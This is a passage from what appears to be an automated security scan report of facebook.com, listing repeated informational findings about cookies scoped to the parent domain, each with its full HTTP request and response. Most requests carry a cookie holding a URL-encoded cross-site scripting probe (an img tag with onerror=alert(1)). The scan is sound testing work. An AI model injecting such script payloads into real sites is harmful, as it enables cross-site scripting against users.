Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.138.81
Connection: close
Date: Thu, 05 May 2011 11:42:01 GMT
Content-Length: 26986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.62. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Editor-in-Chief/137829579583400

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Editor-in-Chief/137829579583400 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.75
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.63. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Gilco-Corporation/109823499042436

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Gilco-Corporation/109823499042436 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.156.75
Connection: close
Date: Thu, 05 May 2011 11:41:52 GMT
Content-Length: 26978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.64. http://www.facebook.com/pages/HMFIC/149403761740008

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/HMFIC/149403761740008

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/HMFIC/149403761740008 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.83
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 26855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.65. http://www.facebook.com/pages/HuffPost-World/70242384902

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/HuffPost-World/70242384902

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/HuffPost-World/70242384902 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.facebook.com/HuffPostWorld
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.43
Connection: close
Date: Thu, 05 May 2011 11:42:02 GMT
Content-Length: 0


10.66. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Manchester-Connecticut/112527912096312

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Manchester-Connecticut/112527912096312 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.35
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 41389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.67. http://www.facebook.com/pages/Merchandiser/123981654314779

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Merchandiser/123981654314779

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Merchandiser/123981654314779 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.41
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 26925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.68. http://www.facebook.com/pages/New-Haven-College/130105783687523

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/New-Haven-College/130105783687523

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/New-Haven-College/130105783687523 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.61
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 26979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.69. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Northern-Illinois-University/108155335871674

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Northern-Illinois-University/108155335871674 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.57
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.70. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/San-Antonio-Texas/110297742331680

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/San-Antonio-Texas/110297742331680 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.69
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 39429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.71. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/School-of-Hard-Knocks-University-of-Life/115228431825707 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.39
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.72. http://www.facebook.com/pages/Sporting-News/104068362964496

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Sporting-News/104068362964496

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Sporting-News/104068362964496 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.135.73
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.73. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.37
Connection: close
Date: Thu, 05 May 2011 11:42:02 GMT
Content-Length: 47298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.74. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/University-of-Chicago-Semester-in-Madrid/144554762263161 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.159.71
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.75. http://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.28.109
Connection: close
Date: Thu, 05 May 2011 10:56:39 GMT
Content-Length: 32043

